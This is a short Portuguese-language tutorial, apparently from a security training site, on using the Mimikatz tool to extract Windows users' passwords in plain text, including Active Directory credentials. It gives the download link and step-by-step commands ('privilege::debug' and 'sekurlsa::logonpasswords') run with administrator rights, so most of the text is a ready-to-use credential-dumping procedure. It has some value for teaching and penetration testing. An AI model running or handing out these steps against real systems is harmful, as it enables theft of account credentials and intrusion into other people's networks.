O MimiKatz é uma ferramenta desenvolvida em C que permite explorar a segurança do Windows e consegue extrair em texto plano as Senhas dos Usuários, incluindo Active Directory em um ambiente de rede.

Projeto : github.com/gentilkiwi/mimikatz

01 - Passo

Realize o download o MimiKatz e extraia o arquivo compactado.

https://github.com/gentilkiwi/mimikatz/releases/download/2.0.0-alpha-20150122/mimikatz_trunk.zip

02 - Passo

Certifique-se da arquitetura do seu processador se é 32 ou 64 bits, no meu caso 64 bits então basta abrir a pasta x64 e executar o MimiKatz como Administrador.

03 - Passo

O MimiKatz é iniciado.

04 - Passo

Execute o comando:

Windows
mimikatz # privilege::debug

05 - Passo

Execute o comando:

Windows
mimikatz # sekurlsa::logonpasswords

06 - Passo

Utilize a barra de rolagem para localizar o Usuário e Senha.



  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2020 - 100SECURITY

Contato